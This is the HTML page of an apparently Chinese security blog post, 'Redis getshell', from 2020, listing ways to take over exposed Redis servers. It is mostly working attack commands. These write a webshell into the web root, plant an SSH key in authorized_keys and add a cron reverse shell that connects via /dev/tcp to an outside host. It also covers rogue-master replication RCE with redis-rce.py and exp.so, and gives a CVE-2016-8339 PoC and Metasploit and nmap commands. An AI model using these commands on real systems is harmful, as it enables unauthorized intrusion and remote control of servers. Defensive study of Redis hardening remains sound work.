<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"lnva9say.top","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="谈6种redis getshell姿势">
<meta property="og:type" content="article">
<meta property="og:title" content="Redis getshell">
<meta property="og:url" content="https://lnva9say.top/2020/04/16/Redis-getshell/index.html">
<meta property="og:site_name" content="baishuo">
<meta property="og:description" content="谈6种redis getshell姿势">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://baishuo.oss-cn-beijing.aliyuncs.com/img/20200416220415.png">
<meta property="og:image" content="https://baishuo.oss-cn-beijing.aliyuncs.com/img/20200416221301.png">
<meta property="og:image" content="https://baishuo.oss-cn-beijing.aliyuncs.com/img/20200416222217.png">
<meta property="article:published_time" content="2020-04-16T13:39:45.000Z">
<meta property="article:modified_time" content="2020-04-18T09:54:56.326Z">
<meta property="article:author" content="baishuo">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://baishuo.oss-cn-beijing.aliyuncs.com/img/20200416220415.png">

<link rel="canonical" href="https://lnva9say.top/2020/04/16/Redis-getshell/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>Redis getshell | baishuo</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">baishuo</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://lnva9say.top/2020/04/16/Redis-getshell/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/baishuo.jpg">
      <meta itemprop="name" content="baishuo">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="baishuo">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Redis getshell
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-04-16 21:39:45" itemprop="dateCreated datePublished" datetime="2020-04-16T21:39:45+08:00">2020-04-16</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-04-18 17:54:56" itemprop="dateModified" datetime="2020-04-18T17:54:56+08:00">2020-04-18</time>
              </span>

          
            <div class="post-description">谈6种redis getshell姿势</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h4 id="redis-RCE"><a href="#redis-RCE" class="headerlink" title="redis RCE"></a>redis RCE</h4><p><strong>1.利用写文件getshell</strong></p>
<p>​    1.1    设置web路径：config set dir /var/www/html</p>
<p>​    1.2    设置shell文件名：config set dbfilename phpinfo.php</p>
<p>​    1.3    向数据库插入payload：set payload “<?php phpinfo(); ?>“</p>
<p>​    1.4    保存webshell： save</p>
<p><strong>2、写ssh公钥</strong></p>
<p>​    2.1    生成ssh私钥对：ssh-keygen -t rsa</p>
<p>​    2.2    将公钥文件内容上下留两行(避免脏数据影响)：vim id_rsa.pub</p>
<p>​    2.3    读取公钥文件保存到数据库中： </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cat &#x2F;root&#x2F;.ssh&#x2F;id_rsa.pub | .&#x2F;redis-cli -h 10.10.12.78 -x set ssh</span><br><span class="line">OK</span><br></pre></td></tr></table></figure>

<p>​    2.4    设置公钥地址文件名并且保存：keys ssh、config.set dir /home/ubuntu/.ssh、config set dbfilename “authorize_keys” 、save</p>
<p>​    2.5    通过私钥登陆：ssh <a href="mailto:ubuntu@10.10.12.78">ubuntu@10.10.12.78</a> -i /root/.ssh/id_rsa</p>
<p><strong>3、写定时任务反弹shell</strong></p>
<p>​    这个方法只能Centos上使用，Ubuntu上行不通。原因如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1.权限问题，ubuntu定时任务需要root权限</span><br><span class="line">2.redis备份文件存在乱码，在Ubuntu上会报错，而在Centos上不会报错</span><br></pre></td></tr></table></figure>

<p>​    3.1    设置文件名和路径（windos与Linux或者其他不同）：config set dir /var/spool/crom/crontabs、config set dbfilename root</p>
<p>​    3.2    插入定时任务：set payload “* * * * * * bash -i &gt;&amp; /dev/tcp/10.10.12.47/8888 0&gt;&amp;1”</p>
<p>​    3.3 保存：save</p>
<p><strong>以上三种方法所需要的条件 ：</strong></p>
<p>​    需要知道写的文件地址和路径</p>
<p>​    需要对写入文件有读写权限</p>
<p>​    会写入很多无用数据，可能会导致程序出错</p>
<p>​    需要利用到其他程序，比如web应用程序，如果doker部署，上述方法失效</p>
<p><strong>4、基于出从复制rce</strong></p>
<p>​    算是新鲜出炉，什么是主从复制和redis的模块</p>
<p>​    4.1    redis主从复制</p>
<p>​        如果当把数据存储在单个redis实例中，当读写体量比较大的时候，服务端就很难承受。为了应对这种情况，Redis就提供了主从模式，**主从模式就是指使用一个redis实例作为主机，其他实例都作为备份机，其中主机和从机数据相同，而从机只负责读，主机只负责写，通过读写分离可以大幅度减轻流量的压力，算是一种通过牺牲空间来换取效率的缓解方式。</p>
<p>​        <img src="https://baishuo.oss-cn-beijing.aliyuncs.com/img/20200416220415.png" alt=""></p>
<p>​    4.2    redis模块</p>
<p>​            和mysql类似，redis也支持扩展命令，我们需要编写so文件，来扩展命令，通过加载so文件来扩展命令。</p>
<p>​    4.3    写一个可执行系统命令的扩展：</p>
<p>​            MODULE LOAD /root/redis-rogue-server /exp.so</p>
<p>​            system.exec “id”</p>
<p>​    4.4    具体步骤：</p>
<p>​            4.4.1    伪装成redis数据库，然后受害者将我们的数据设置为主节点。</p>
<p>​            4.4.2    我们设置备份文件名为so文件</p>
<p>​            4.4.3    设置传输方式为全量传输</p>
<p>​            4.4.4    加载so文件，实现任意命令执行</p>
<p>​    4.5    原理：</p>
<p>​        redis主从数据库之间的同步分为两种，全量复制和部分复制，全量复制是将数据库备份文件整个传输过去，然后从节点清空内存数据库，将备份文件加载到数据库中。而部分复制只是将写命令发送给从节点。</p>
<p>​        这里选择全量复制，就可以将部分文件 so 文件传输过去。</p>
<p>​        根据协议收包发包伪装成数据库</p>
<p>​    <img src="https://baishuo.oss-cn-beijing.aliyuncs.com/img/20200416221301.png" alt=""></p>
<p>​    利用脚本连接：<a href="https://github.com/Ridter/redis-rce" target="_blank" rel="noopener">https://github.com/Ridter/redis-rce</a></p>
<p>​    python redis-rce.py -r 127.0.0.1 -L 127.0.0.1 -f exp.so</p>
<p>​    我们可以使用-v参数看下具体发了哪些数据包来帮助理解。</p>
<p>​    python redis-rce.py -r 127.0.0.1 -L 127.0.0.1 -f exp.so -v</p>
<p><strong>5、redis 远程代码执行漏洞（CVE-2016-8339）</strong></p>
<p>​    Redis 3.2.x &lt; 3.2.4 版本存在缓冲区溢出漏洞，可导致任意代码执行。Redis数据结构存储的CONFIG SET命令中client-output-buffer-limit选项处理存在越界写漏洞。构造CONFIG SET 命令可导致越界写，代码执行。</p>
<p>​    POC：</p>
<p>​        config set client-output-buffer-limit “master 1094795585 1094795585 1094795585”</p>
<p>​        <img src="https://baishuo.oss-cn-beijing.aliyuncs.com/img/20200416222217.png" alt=""></p>
<p>可以发现 <strong>aof_state</strong> 、<strong>aof_filename</strong>、以及<strong>aof_no_fsync_on_rewrite</strong> 被覆写了。</p>
<p><strong>6、CVE-2015-8080</strong></p>
<p>​    Redis 2.8.x在2.8.24以前和3.0.x在3.0.6以前版本，lua_struct.c中存在getnum函数证书溢出，允许上下文相关的攻击者许可运行Lua代码（内存损坏和应用程序奔溃）或可能绕过沙盒限制意图通过大量，触发基于栈的缓冲区溢出</p>
<p><strong>7、CVE-2015-4335</strong></p>
<p>​    Redis 2.8.1之前版本和3.0.2之前3.x版本中存在安全漏洞。远程攻击者可执行eval命令利用该漏洞执行任意Lua字节码</p>
<p><strong>8、CVE-2013-7458读取”.rediscli_history”配置文件信息。</strong></p>
<p><strong>msf下利用模块</strong></p>
<pre><code>auxiliary/scanner/redis/file_upload normal Redis File Upload
auxiliary/scanner/redis/redis_login normal Redis Login Utility
auxiliary/scanner/redis/redis_server normal Redis Command Execute Scanner</code></pre><p><strong>Redis 除了getshell还可以</strong></p>
<p>​    内网端口扫描：nmap -v -n -Pn -p 6379 -sV –scriptredis-info 192.168.56.1/24</p>
<p>​    通过文件包含读取其配置文件：Redis配置文件中一般会设置明文密码，在进行渗透时也可以通过webshell查看其配置文件，Redis往往不只一台计算机，可以利用其来进行内网渗透，或者扩展权限渗透。</p>
<p>​    使用redis暴力破解工具</p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/04/16/json-csrf%E6%94%BB%E5%87%BB/" rel="prev" title="json csrf攻击">
      <i class="fa fa-chevron-left"></i> json csrf攻击
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/04/16/sql%E6%B3%A8%E5%85%A5%E4%B9%8B%E9%A2%84%E7%BC%96%E8%AF%91/" rel="next" title="sql注入之预编译">
      sql注入之预编译 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#redis-RCE"><span class="nav-number">1.</span> <span class="nav-text">redis RCE</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="baishuo"
      src="/images/baishuo.jpg">
  <p class="site-author-name" itemprop="name">baishuo</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">16</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">baishuo</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
